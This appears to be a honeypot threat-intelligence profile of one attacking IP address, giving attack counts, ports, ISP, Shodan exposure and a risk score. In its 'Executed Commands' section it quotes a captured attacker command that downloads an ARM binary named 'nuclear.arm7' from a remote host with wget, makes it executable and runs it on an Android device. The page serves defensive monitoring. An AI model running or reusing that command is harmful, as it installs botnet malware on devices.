TROYANOSYVIRUS
Active Threat β€’ HIGH

87.120.191.127

First Detection3/18/2026
Last Activity3/31/2026
ISPVpsvault.host Ltd
🎯
2,653
Total Attacks
πŸ”Œ
4
Ports
πŸ“‘
3
Attack Types
🦠
0
Malware

Geolocation

Country
πŸ‡ΊπŸ‡Έ United States
City
Unknown
ASN
AS215925
ISP
Vpsvault.host Ltd

Attack Types

adb_honeypot
malware_capture
tcp_trap

Attacked Ports

81555580818088

Associated Malware

No associated malware

Executed Commands

$cd /data/local/tmp; rm -rf nuclear.arm7; wget http://87.120.191.32/nuclear.arm7; chmod 777 nuclear.arm7; ./nuclear.arm7 sexo; rm -rf nuclear.arm74x

Shodan InternetDB ExposureShodan

InternetDB data, not real-time

Ports
2230699998
CPEs
cpe:/a:openbsd:openssh:8.9p1cpe:/o:canonical:ubuntu_linuxcpe:/a:expressjs:expresscpe:/a:nodejs:node.js

Risk Assessment

60
/100
LowMediumHighCritical